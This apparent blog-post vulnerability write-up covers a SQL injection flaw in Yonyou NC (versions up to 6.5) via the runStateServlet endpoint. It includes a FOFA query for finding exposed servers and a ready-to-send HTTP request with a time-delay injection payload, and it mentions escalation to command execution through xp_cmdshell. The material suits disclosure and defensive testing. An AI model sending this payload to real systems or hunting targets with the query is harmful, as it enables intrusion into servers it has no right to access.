Babing
Published on 2024-08-30 / 3 Visits
0
0

Y4-77用友-NC-SQL

Y4-77用友-NC-SQL

漏洞描述:

用友NC /portal/pt/servlet/runStateServlet接口存在SQL注入漏洞,攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。

影响版本:

用友网络科技股份有限公司-NC version<=6.5  

网站图片:

image-20240623123849427

网络测绘:

fofa语法:

icon_hash=“1085941792” && body=“/logo/upload/images/logo.gif”

漏洞复现:

payload:

GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

效果图:
延时5秒


Comment